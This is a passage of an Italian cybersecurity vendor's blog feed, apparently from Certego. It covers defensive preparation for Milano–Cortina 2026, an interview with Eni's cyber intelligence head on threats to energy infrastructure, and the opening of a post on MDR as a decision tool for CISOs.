&lt;li&gt;comunicazione e canali ufficiali: social, siti, app, messaggistica al pubblico&lt;/li&gt;
&lt;li&gt;fornitori e operations: turni, badge, sistemi interni, strumenti di assistenza&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Sono tutte aree dove anche un problema “piccolo” diventa enorme perché impatta direttamente l’esperienza.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h1&gt;Prepararsi bene, senza vivere male: cosa fare davvero, in ordine di resa&lt;/h1&gt;
&lt;p&gt;Qui il punto non è comprare “un prodotto in più”. È fare bene le basi, con un criterio: stare pronti batte diventare pronti.&lt;/p&gt;
&lt;h3&gt;1) Inventario e dipendenze: sapere chi tocca cosa&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;quali sistemi sono “core”&lt;/li&gt;
&lt;li&gt;quali sono temporanei&lt;/li&gt;
&lt;li&gt;quali sono gestiti da terze parti&lt;/li&gt;
&lt;li&gt;quali integrazioni/API esistono davvero (non solo su carta)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Se non si vede, non si difende. E soprattutto: non si ripristina in fretta.&lt;/p&gt;
&lt;h3&gt;2) Accesso: ridurre privilegi, alzare attrito, eliminare eccezioni&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;MFA ovunque (davvero ovunque, soprattutto su email e VPN)&lt;/li&gt;
&lt;li&gt;principi di minimo privilegio&lt;/li&gt;
&lt;li&gt;controllo di accesso “just in time” dove possibile&lt;/li&gt;
&lt;li&gt;revisione periodica degli account (in particolare contractor e stagionali)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Durante un evento, l’attaccante spesso non “buca”: entra da una porta rimasta socchiusa.&lt;/p&gt;
&lt;h3&gt;3) Supply chain: contratti e controlli operativi&lt;/h3&gt;
&lt;p&gt;Non basta chiedere “siete ISO?”. Serve chiarezza su:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;chi può accedere e come&lt;/li&gt;
&lt;li&gt;logging e tracciabilità&lt;/li&gt;
&lt;li&gt;tempi di notifica incidenti&lt;/li&gt;
&lt;li&gt;escalation e contatti 24/7&lt;/li&gt;
&lt;li&gt;test e audit minimi sugli ambienti esposti&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Gli attaccanti amano i passaggi laterali: non serve colpire il bersaglio più protetto se c’è un partner più accessibile.&lt;/p&gt;
&lt;h3&gt;4) Monitoraggio e risposta: ridurre tempi, non solo prevenire&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;playbook pronti (phishing/BEC, account takeover, DDoS, leak)&lt;/li&gt;
&lt;li&gt;esercitazioni tabletop “realistiche” (con pressione, telefonate, social, media)&lt;/li&gt;
&lt;li&gt;canali di comunicazione interni alternativi (quando la mail è “sospetta”)&lt;/li&gt;
&lt;li&gt;metriche pratiche: quanto tempo per rilevare? quanto per contenere?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Nel mondo reale, la differenza la fa la velocità: capire presto e limitare danni.&lt;/p&gt;
&lt;h3&gt;5) Dismissione: chiudere bene ciò che si apre per l’evento&lt;/h3&gt;
&lt;p&gt;La parte più trascurata. E una delle più pericolose.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;spegnere ambienti temporanei&lt;/li&gt;
&lt;li&gt;revocare accessi&lt;/li&gt;
&lt;li&gt;eliminare DNS “appesi”&lt;/li&gt;
&lt;li&gt;archiviare in modo sicuro dati e log&lt;/li&gt;
&lt;li&gt;verificare che non restino portali o pannelli admin esposti&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Il “dopo” è spesso quando ci si rilassa. E chi attacca lo sa.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h1&gt;L’obiettivo non è avere paura, è avere margine&lt;/h1&gt;
&lt;p&gt;Milano–Cortina 2026 sarà un acceleratore: di turismo, di business, di infrastrutture, di attenzione globale. Ed è ragionevole aspettarsi che anche l’attività dei threat actor aumenti, perché aumentano incentivi e opportunità.&lt;/p&gt;
&lt;p&gt;La buona notizia è che non serve vivere l’evento in modalità “allarme rosso”.&lt;/p&gt;
&lt;p&gt;Serve viverlo in modalità preparazione: basi solide, processi chiari, supply chain governata, risposta allenata.
Perché, quando tutti corrono, vince chi ha già fatto il riscaldamento.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h1&gt;L’oro vero è il tempo: perché MDR e Threat Intelligence contano&lt;/h1&gt;
&lt;p&gt;Negli eventi ad alta esposizione non vince chi evita ogni rischio, ma chi lo intercetta prima e reagisce meglio.&lt;/p&gt;
&lt;p&gt;MDR serve a questo: trasformare segnali sparsi in azioni rapide — riducendo rumore, accelerando triage e contenimento.&lt;/p&gt;
&lt;p&gt;Threat Intelligence aggiunge il contesto: quali minacce sono attive oggi, quali tecniche stanno cambiando, cosa vale davvero la pena monitorare.&lt;/p&gt;
&lt;p&gt;Insieme fanno la differenza: più velocità, più precisione, più margine operativo.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;a href=&quot;https://www.certego.net/blog/il-fattore-umano-nell-mdr-come-valutare/&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAAKABQDASIAAhEBAxEB/8QAFwAAAwEAAAAAAAAAAAAAAAAAAAIDBf/EABQBAQAAAAAAAAAAAAAAAAAAAAH/2gAMAwEAAhADEAAAAdWTVRBQf//EABoQAAMAAwEAAAAAAAAAAAAAAAABAgMSMkH/2gAIAQEAAQUC9yU5JvZT0I//xAAUEQEAAAAAAAAAAAAAAAAAAAAQ/9oACAEDAQE/AT//xAAUEQEAAAAAAAAAAAAAAAAAAAAQ/9oACAECAQE/AT//xAAXEAADAQAAAAAAAAAAAAAAAAAAAREQ/9oACAEBAAY/AhSssHv/xAAaEAACAgMAAAAAAAAAAAAAAAAAARExECHh/9oACAEBAAE/IVrgmqsclgLLRRR//9oADAMBAAIAAwAAABBwL//EABYRAQEBAAAAAAAAAAAAAAAAAAEAEf/aAAgBAwEBPxAJMv/EABcRAQADAAAAAAAAAAAAAAAAAAABESH/2gAIAQIBAT8QtGv/xAAcEAEAAgMAAwAAAAAAAAAAAAABACERMUFRkfD/2gAIAQEAAT8QCqICwgCVjWC8J5hdQxdRu37MASwb7OS9T//Z&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 1&quot; title=&quot;&quot; src=&quot;/website/static/6a6afe1626f014faadb2dc84888723cf/ac99c/Valutare-le-competenze-umane.jpg&quot; srcset=&quot;/website/static/6a6afe1626f014faadb2dc84888723cf/4ecad/Valutare-le-competenze-umane.jpg 384w,
/website/static/6a6afe1626f014faadb2dc84888723cf/212bf/Valutare-le-competenze-umane.jpg 768w,
/website/static/6a6afe1626f014faadb2dc84888723cf/ac99c/Valutare-le-competenze-umane.jpg 1536w,
/website/static/6a6afe1626f014faadb2dc84888723cf/294ea/Valutare-le-competenze-umane.jpg 1615w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;</content:encoded></item><item><title><![CDATA[Cybersecurity ed energia]]></title><description><![CDATA[La resilienza delle infrastrutture critiche passa dalla difesa collettiva]]></description><link>https://www.certego.net/blog/cybersecurity-e-energia-resilienza-infrastrutture-critiche/</link><guid isPermaLink="false">cybersecurity-e-energia-resilienza-infrastrutture-critiche</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><pubDate>Sun, 25 Jan 2026 23:00:00 GMT</pubDate><content:encoded>&lt;h1&gt;Il punto di vista di Certego&lt;/h1&gt;
&lt;p&gt;Il settore energetico è tra i più strategici e vulnerabili nel panorama cyber globale. La natura critica delle infrastrutture, l’elevata interconnessione dei sistemi e un contesto geopolitico sempre più instabile rendono energia e cybersecurity due dimensioni ormai inseparabili. Il confronto con grandi operatori industriali – come emerge anche dall’intervista a Francesco Ceraso, Head of Security Cyber Intelligence – restituisce un quadro lucido e privo di semplificazioni: un settore in cui la convergenza tra IT e OT, la pressione geopolitica e la crescente integrazione delle filiere fanno sì che ogni attacco informatico possa rapidamente trasformarsi in un evento sistemico, con impatti che vanno ben oltre il perimetro dell’organizzazione colpita.&lt;/p&gt;
&lt;p&gt;I dati confermano questa tendenza. Dal report &lt;strong&gt;State of Cybersecurity di Certego&lt;/strong&gt;, basato sull’analisi di oltre 1.200.000 asset IT monitorati, emerge che &lt;strong&gt;nel primo semestre del 2025 in Italia gli attacchi verso il settore energetico sono aumentati del 4,3%&lt;/strong&gt;. Un dato che non racconta solo una crescita quantitativa, ma segnala un’evoluzione qualitativa delle minacce, sempre più orientate a campagne strutturate, persistenti e ad alto impatto operativo.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h3&gt;Dalla protezione degli asset alla resilienza del sistema&lt;/h3&gt;
&lt;p&gt;Un attacco cyber alle infrastrutture energetiche non resta mai confinato: blackout, interruzioni di fornitura e impatti su trasporti, telecomunicazioni e servizi essenziali sono scenari concreti. La cybersecurity, quindi, non può essere letta come una funzione tecnica isolata, ma è un &lt;strong&gt;elemento strutturale della sicurezza nazionale e della stabilità economica&lt;/strong&gt;.
“Nel settore energetico la posta in gioco è la continuità operativa del Paese. Parlare di cybersecurity significa parlare di resilienza sistemica, non solo di protezione dei singoli asset”, sottolinea &lt;strong&gt;Bernardino Gregorio Grignaffini, CEO &amp;#x26; Founder di Certego&lt;/strong&gt;.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h3&gt;Threat Intelligence: anticipare, non solo reagire&lt;/h3&gt;
&lt;p&gt;Un elemento centrale nella visione di Certego è il ruolo della Threat Intelligence. La capacità di individuare segnali deboli, campagne in fase di preparazione e pattern comportamentali avanzati è oggi ciò che consente di passare da una difesa reattiva a una postura realmente proattiva.
Come ricorda Grignaffini: “La vera differenza oggi la fa la capacità di anticipare le mosse dell’avversario. La &lt;strong&gt;Threat Intelligence non è un feed di indicatori, ma un processo continuo di analisi&lt;/strong&gt;, contestualizzazione e previsione, soprattutto in ambienti complessi come quelli IT/OT”.
Inoltre, è importante evidenziare come, nel settore energetico, la persistenza silente degli attaccanti rappresenta una delle minacce più insidiose. Chi attacca può restare all’interno delle reti per mesi, mappando sistemi e processi, in attesa del momento più opportuno per massimizzare l’impatto.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h3&gt;Condivisione delle informazioni e difesa collettiva&lt;/h3&gt;
&lt;p&gt;Un altro elemento chiave per la sicurezza del settore energetico è il valore dell’&lt;strong&gt;information sharing&lt;/strong&gt;. Nessuna organizzazione può avere una visibilità completa sul panorama delle minacce: la sicurezza del singolo dipende sempre più da quella dell’intero ecosistema.
“La difesa collettiva è l’unico modello sostenibile. Condividere informazioni sulle minacce in modo tempestivo e strutturato significa aumentare il livello di sicurezza di tutti”, continua Grignaffini.
In quest’ottica che Certego partecipa attivamente a circuiti internazionali di scambio informativo come &lt;strong&gt;FIRST (Forum of Incident Response and Security Teams)&lt;/strong&gt;, contribuendo a una visione globale delle minacce emergenti, particolarmente rilevante in un contesto esposto a dinamiche geopolitiche complesse.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h3&gt;Supply chain e convergenza IT/OT: le nuove superfici di attacco&lt;/h3&gt;
&lt;p&gt;L’attenzione crescente verso la supply chain e la convergenza tra IT e OT rappresenta uno dei nodi critici per il futuro del settore energetico. Ogni fornitore, partner tecnologico o sistema interconnesso diventa un potenziale vettore di attacco.
“La sicurezza della supply chain non è più un tema di compliance, ma di sopravvivenza operativa. &lt;strong&gt;Serve visibilità, monitoraggio continuo e capacità di risposta coordinata lungo tutta la filiera&lt;/strong&gt;”, evidenzia Grignaffini.
In questo scenario, servizi MDR evoluti, supportati da intelligence contestualizzata e capacità di detection avanzata, diventano un abilitatore essenziale per governare la complessità e ridurre il rischio.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h3&gt;Oltre la tecnologia: governance e normativa&lt;/h3&gt;
&lt;p&gt;Il rafforzamento della sicurezza delle infrastrutture energetiche passa anche da un quadro normativo europeo sempre più strutturato.  La &lt;strong&gt;Direttiva NIS2&lt;/strong&gt; amplia in modo significativo gli obblighi per operatori essenziali e importanti, includendo esplicitamente energia e utilities, e introduce requisiti più stringenti su gestione del rischio, governance, supply chain security e incident reporting.
A livello europeo, iniziative coordinate da ENISA, esercitazioni congiunte e programmi di cooperazione transfrontaliera mirano a rafforzare una postura comune di difesa, riconoscendo che un attacco a un’infrastruttura critica in uno Stato membro può avere impatti sistemici sull’intera Unione.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h3&gt;Quando il cyber diventa fisico&lt;/h3&gt;
&lt;p&gt;La storia recente dimostra come queste minacce non siano solo teoriche. Nel contesto delle guerre che oggi vengono definite ibride, in cui la dimensione cyber svolge un ruolo centrale accanto a quella militare, economica e informativa, il comparto energetico rappresenta uno degli obiettivi più strategici. Gli attacchi informatici contro infrastrutture elettriche, come quelli subiti dalla rete ucraina, dimostrano come operazioni cyber mirate possano provocare blackout, interrompere servizi essenziali e avere un impatto diretto sulla popolazione. Il conflitto russo-ucraino ha reso evidente che colpire l’energia significa colpire la resilienza di un Paese.
Ma la realtà è che &lt;strong&gt;la tecnologia, da sola, non basta&lt;/strong&gt;. Formazione, consapevolezza e integrazione della cybersecurity nei processi di governance sono fattori determinanti per costruire una reale resilienza.
“La cybersecurity nel settore energetico, così come in tutti i settori essenziali, è una responsabilità condivisa. Tecnologia, persone e processi devono evolvere insieme, con una visione chiara del rischio e del contesto in cui si opera”, conclude Grignaffini.&lt;/p&gt;
&lt;div align=&quot;left&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/233dd895dee1cec12212900c26052678/a878e/Ceraso.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAC4jAAAuIwF4pT92AAACrUlEQVR42j1SXUhTYRg+5oVIZEVCVORNIdhFSUmldJFRpmhIgZk3apSWRRiaImHZDwpRIHXRf1kZyLKY6UybOvNnTufm3ObO3I/bztnZdvbj8jYvztO7KV48vM/397zv+70P41jyQP5bBdXYJHoVA9AZjOB9IlycABfvgzsG4gLtafRmTOmMiEZXwHn9cHm88NB5DLE13VtlnC4O4xNqWFkr/qhGwVIMBEQIXh/8gg9eikv0MByJokPWh22ZBbjf/oESehEJR+H2CPGEG4JLnA8zThFDFgHjNhGTiwImWA5jLA/FvAdzDi84ehAKRvBFMQLmYD6YtBwcyC9HR3c/xGAYATEU72hdUMBXrRtvptzo1Lri/DXxHoMHaisPnX1dMBTB594hMDklSDhTDuZQARLSc5FXfRfDah2Wl6PgvX4SpJJH5h0YNdgwPGfDoM6GLrUFWqsboj+w0XKsvS7lGFILS7H5XAUSzt/EprxKMIeLsfVEGeqevod50bnKxPo3Gc0wEhYWWCyYzLAQWOJmixWLdie8NBCbw4nGhkrcLs1EbdVp7L56C0xlM5Iv1mF70Q0kZ13C80/yNUG9iY1DZyRQZVobtWrjMM16YLZ7EIqsQCb7iMKzGWi8kIGWy0eRW1qAlJpW7LneirSSWuwvacC77qFVxkVD0Tr8mCHoXQGwXAB6+rd5p4BZigY7h2D4L2TfOnE8Ox13qotRUXYKx05mYV9RFY5QlZll9ci+1oauAQ0J0v8oBlWQ9ynxvecXpqZnyTZB8Dx5T/BTXPNYzF7VNVfQ2FSPR4/vYefeNDCJW5CYsgtJO4gnpaKt/SUNxc1LPxVKSd47KMl+9EmjExqJFwISJZLICmsgHtvjBVEyLbASx/skzYxeevHqrfTgyTPpIaGpuQX9A8p//wFCJWNpJ9Y8ZQAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 1&quot; title=&quot;&quot; src=&quot;/website/static/233dd895dee1cec12212900c26052678/71c1d/Ceraso.png&quot; srcset=&quot;/website/static/233dd895dee1cec12212900c26052678/804b2/Ceraso.png 384w,
/website/static/233dd895dee1cec12212900c26052678/e5715/Ceraso.png 768w,
/website/static/233dd895dee1cec12212900c26052678/71c1d/Ceraso.png 1536w,
/website/static/233dd895dee1cec12212900c26052678/a878e/Ceraso.png 2048w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
  
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;h1&gt;Cybersecurity ed energia: la nuova frontiera della sicurezza nazionale&lt;/h1&gt;
&lt;h4&gt;Intervista a Francesco Ceraso, Head of Security Cyber Intelligence di Eni S.p.A.&lt;/h4&gt;
&lt;p&gt;La sicurezza delle infrastrutture energetiche è oggi una delle sfide più critiche nel &lt;strong&gt;panorama geopolitico e industriale globale&lt;/strong&gt;. Attacchi cyber sempre più sofisticati, convergenza tra IT e OT e nuove superfici di rischio impongono un cambio di paradigma nella difesa del settore Energy &amp;#x26; Utilities. In questa intervista, &lt;strong&gt;Francesco Ceraso, Head of Security Cyber Intelligence di Eni S.p.A.&lt;/strong&gt;, analizza l’evoluzione delle minacce informatiche, il ruolo strategico della cyber intelligence e dell’intelligenza artificiale, e l’importanza della collaborazione tra aziende, istituzioni e partner internazionali per garantire la resilienza di infrastrutture considerate oggi un pilastro della sicurezza nazionale.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Quali sono oggi le principali minacce informatiche che riguardano le infrastrutture energetiche critiche, come oleodotti, gasdotti e reti elettriche?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Il numero di attacchi riusciti nel settore Energy &amp;#x26; Utilities è aumentato di oltre una volta e mezza in cinque anni, dal 2020 al 2024 (fonte Clusit). Ma non solo: le minacce che investono oggi il settore energetico &lt;strong&gt;rappresentano un’evoluzione qualitativa oltre che quantitativa&lt;/strong&gt;. Non si tratta più di attacchi opportunistici, ma di campagne coordinate e multi-vector, condotte da attori con capacità quasi militari e finalità di lungo termine. Il &lt;strong&gt;ransomware non è più solo uno strumento di estorsione&lt;/strong&gt;: nei contesti OT (Operational Technology) può diventare un’arma di sabotaggio capace di bloccare processi fisici e interrompere la continuità operativa. In questo scenario, la convergenza tra IT e OT e la diffusione di tecnologie IoT industriali amplificano la superficie d’attacco, creando una molteplicità di entry point difficilmente governabili con gli approcci tradizionali. Questa evoluzione si inserisce in un contesto geopolitico sempre più complesso, in cui attacchi ransomware e operazioni sponsorizzate da stati – come quelle attribuite a Lazarus Group, CyberAv3ngers, Sandworm Team e Midnight Blizzard – prendono di mira infrastrutture energetiche critiche, dagli oleodotti ai server SCADA fino alle reti PLC. Dal punto di vista della cyber intelligence, il fenomeno più preoccupante resta la persistenza silente: attori ostili che infiltrano le reti, costruiscono accessi privilegiati, mappano sistemi e restano dormienti fino al momento in cui l’impatto operativo e mediatico può essere massimizzato.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Quali sono le conseguenze potenziali di un attacco informatico riuscito su una rete energetica?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Un attacco informatico a un’infrastruttura energetica non ha mai un effetto confinato al dominio digitale: si trasforma rapidamente in un &lt;strong&gt;evento fisico, economico e geopolitico&lt;/strong&gt;. Le possibili conseguenze includono blackout su larga scala, interruzione delle forniture di gas o petrolio, compromissione di sistemi SCADA e DCS, o – nei casi più gravi – danneggiamento fisico degli impianti. Inoltre, l’effetto domino su altri settori critici, come trasporti, servizi di emergenza, logistica o telecomunicazioni, legati tra di loro da interdipendenze operative, è spesso inevitabile con ricadute a cascata su tutte le infrastrutture vitali del Paese.&lt;/p&gt;
&lt;p&gt;Dal punto di vista dell’intelligence, questi attacchi rientrano nel paradigma delle &lt;strong&gt;minacce ibride&lt;/strong&gt;, dove la componente cyber è solo un tassello di una strategia più ampia di pressione economica o disinformativa. Un’operazione riuscita contro una rete elettrica può essere utilizzata come leva diplomatica o strumento di coercizione geopolitica. È per questo che la resilienza delle infrastrutture energetiche è sempre più vista come un pilastro della sicurezza nazionale.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Quanto è importante la collaborazione con enti governativi, agenzie di sicurezza e altri operatori del settore per prevenire e rispondere alle minacce cyber?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;La collaborazione è la vera chiave di volta della sicurezza cibernetica moderna. Nessuna organizzazione, nemmeno la più strutturata, può disporre di una visibilità completa sul panorama delle minacce. Il valore dell’&lt;strong&gt;infosharing è quindi determinante&lt;/strong&gt;: la condivisione tempestiva di indicatori di compromissione, tattiche e pattern comportamentali consente di anticipare gli attacchi prima che diventino incidenti. In Italia, il legame operativo tra le aziende del settore energetico, l’&lt;strong&gt;Agenzia per la Cybersicurezza Nazionale (ACN)&lt;/strong&gt;, il &lt;strong&gt;CNAIPIC&lt;/strong&gt; della Polizia Postale rappresenta un modello consolidato, ma serve estenderlo in una logica cross-border che includa anche &lt;strong&gt;ENISA, Europol, NATO CCDCOE&lt;/strong&gt; e partner industriali internazionali.&lt;/p&gt;
&lt;p&gt;L’approccio più efficace resta quello della collective defense, dove la difesa di un attore diventa la difesa dell’intero sistema. Le cyber range e le esercitazioni congiunte – soprattutto interdisciplinari – sono elementi fondamentali per testare la resilienza, validare i playbook di risposta e migliorare il coordinamento tra attori pubblici e privati. In un contesto in cui le minacce evolvono in ore, e non in mesi, la velocità nella diffusione delle informazioni è spesso l’elemento che determina la differenza tra contenere un attacco e subirlo.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Che ruolo può giocare oggi l’intelligenza artificiale nella protezione delle reti energetiche da attacchi informatici?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;L’intelligenza artificiale rappresenta un &lt;strong&gt;force multiplier&lt;/strong&gt; per la difesa cibernetica, ma anche un fattore di rischio se mal gestita. Nella cyber threat intelligence, l’IA viene oggi impiegata per l’&lt;strong&gt;analisi predittiva&lt;/strong&gt;, la correlazione massiva di eventi, la rilevazione di anomalie comportamentali e la priorizzazione automatica degli allarmi. Questo permette di passare da modelli di difesa reattiva a paradigmi di difesa predittiva e adattiva, riducendo drasticamente i tempi di detection e migliorando l’accuratezza nel &lt;strong&gt;distinguere tra rumore e reale minaccia&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Parallelamente, però, l’IA è sempre più utilizzata anche dagli attori ostili: per automatizzare campagne di spear phishing, generare deepfake credibili, creare malware autoevolutivi o orchestrare attacchi mirati con logiche di decision loop autonomo. &lt;strong&gt;La sfida è quindi duplice&lt;/strong&gt;: sfruttare l’IA per rafforzare la protezione, ma anche difendersi dall’IA offensiva. Ciò richiede investimenti in algoritmi explainable, per rendere trasparenti e comprensibili le decisioni e i risultati prodotti dai modelli di intelligenza artificiale e capacità umane di supervisione. Alla base deve esserci un principio etico: la sovranità sui dati e sugli algoritmi è ormai parte integrante della sovranità digitale e, quindi, della sicurezza nazionale.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Quali investimenti state facendo in cybersecurity e quali sono le priorità strategiche per i prossimi anni?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;La &lt;strong&gt;transizione energetica&lt;/strong&gt; e la trasformazione digitale stanno ridefinendo il paradigma industriale, esponendo le infrastrutture energetiche a nuove vulnerabilità e minacce cyber sempre più sofisticate, amplificate da dinamiche geopolitiche instabili. In questo scenario, la cybersecurity non può più essere considerata una funzione tecnica isolata, ma deve essere integrata nella governance strategica dell’azienda e nella gestione della supply chain energetica.&lt;/p&gt;
&lt;p&gt;La &lt;strong&gt;catena delle forniture&lt;/strong&gt; rappresenta oggi uno degli elementi più sensibili e strategici per la sicurezza del settore energetico. La crescente interconnessione tra operatori, fornitori e partner tecnologici genera nuove superfici di attacco, dove una singola vulnerabilità può propagarsi rapidamente lungo tutta la filiera, mettendo a rischio la continuità operativa e la resilienza dell’intero sistema. Per rispondere a queste sfide, Eni ha adottato un modello organizzativo “glocal”, con una governance centrale forte e una presenza locale capillare, che consente di monitorare costantemente gli asset IT e OT. In questo contesto, la &lt;strong&gt;cyber intelligence&lt;/strong&gt; di Eni svolge un ruolo proattivo e centrale: non si limita a reagire agli attacchi, ma lavora per anticiparli grazie a modelli predittivi sviluppati internamente e alla collaborazione con istituzioni e partner privati. L’analisi continua delle minacce e delle vulnerabilità lungo la &lt;strong&gt;supply chain&lt;/strong&gt; permette di identificare tempestivamente i rischi emergenti, rafforzando la postura difensiva dell’azienda e garantendo la continuità operativa anche in scenari di crisi. Per questo Eni ha inserito il rischio cyber tra i principali rischi aziendali, gestendolo con strumenti avanzati e una valutazione integrata nel processo di risk management, estesa anche ai fornitori strategici.&lt;/p&gt;
&lt;p&gt;Per rafforzare ulteriormente questa strategia, Eni investe costantemente in programmi di &lt;strong&gt;sensibilizzazione e formazione&lt;/strong&gt; che coinvolgono tutti i livelli aziendali e i partner della filiera, promuovendo una cultura della sicurezza diffusa e consapevole. Simulazioni di phishing, corsi online e campagne di comunicazione contribuiscono concretamente a ridurre il rischio e a rafforzare la capacità di risposta. In ultima analisi, oggi è chiaro che &lt;strong&gt;la cybersecurity non rappresenta più un costo, ma un fattore abilitante di resilienza e vantaggio competitivo&lt;/strong&gt;. Questa consapevolezza guida la nostra strategia per i prossimi anni: proteggere le infrastrutture energetiche significa, sempre più, proteggere la tenuta economica e sociale del Paese e la stabilità del suo futuro energetico.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Dal SOC alla boardroom]]></title><description><![CDATA[L’MDR come strumento decisionale per il CISO]]></description><link>https://www.certego.net/blog/mdr-come-strumento-decisionale-per-il-ciso/</link><guid isPermaLink="false">mdr-come-strumento-decisionale-per-il-ciso</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Thu, 15 Jan 2026 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Per molto tempo l’MDR è stato raccontato esclusivamente come un servizio operativo: monitoraggio continuo, threat hunting, risposta agli incidenti.
Tutto corretto. Ma oggi, per molti CISO, non è più sufficiente.&lt;/p&gt;
&lt;p&gt;Il problema non è solo vedere cosa accade.
&lt;strong&gt;Il problema è decidere&lt;/strong&gt;: cosa è davvero prioritario, cosa richiede un’azione immediata, cosa può essere gestito nel tempo — e soprattutto come spiegare queste scelte a chi governa l’azienda.&lt;/p&gt;
&lt;p&gt;In questo scenario, un MDR maturo non è solo una funzione di sicurezza.
È una funzione che riduce l’incertezza decisionale.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;Quando la sicurezza genera dati, ma non chiarezza&lt;/h2&gt;
&lt;p&gt;Le organizzazioni dispongono di più strumenti di sicurezza che mai. I dati non mancano: alert, log, eventi, report.
Eppure, quando arriva il momento di prendere una decisione — tecnica o strategica — emerge spesso una difficoltà concreta:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;capire su quali informazioni affidabili basare quella decisione&lt;/strong&gt;.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Questo non è solo un tema operativo.
È un tema di &lt;strong&gt;chiarezza e tempestività nelle decisioni&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Un MDR efficace non serve semplicemente a reagire più velocemente.
&lt;strong&gt;Serve a capire prima cosa sta succedendo davvero&lt;/strong&gt;.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;MDR come punto di riferimento per le decisioni di sicurezza&lt;/h2&gt;
&lt;p&gt;Molte roadmap di sicurezza nascono da framework, linee guida, requisiti normativi. Sono strumenti fondamentali, ma spesso scollegati dalla realtà quotidiana dell’organizzazione.&lt;/p&gt;
&lt;p&gt;Un MDR ben progettato introduce un cambio di prospettiva:
porta la sicurezza dal piano teorico a quello osservabile.&lt;/p&gt;
&lt;p&gt;Nel tempo, il servizio MDR diventa un punto di riferimento perché consolida:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;segnali ricorrenti e pattern di attacco reali;&lt;/li&gt;
&lt;li&gt;aree dell’infrastruttura che attirano maggiore attenzione;&lt;/li&gt;
&lt;li&gt;controlli che esistono, ma che nella pratica mostrano limiti evidenti.&lt;/li&gt;
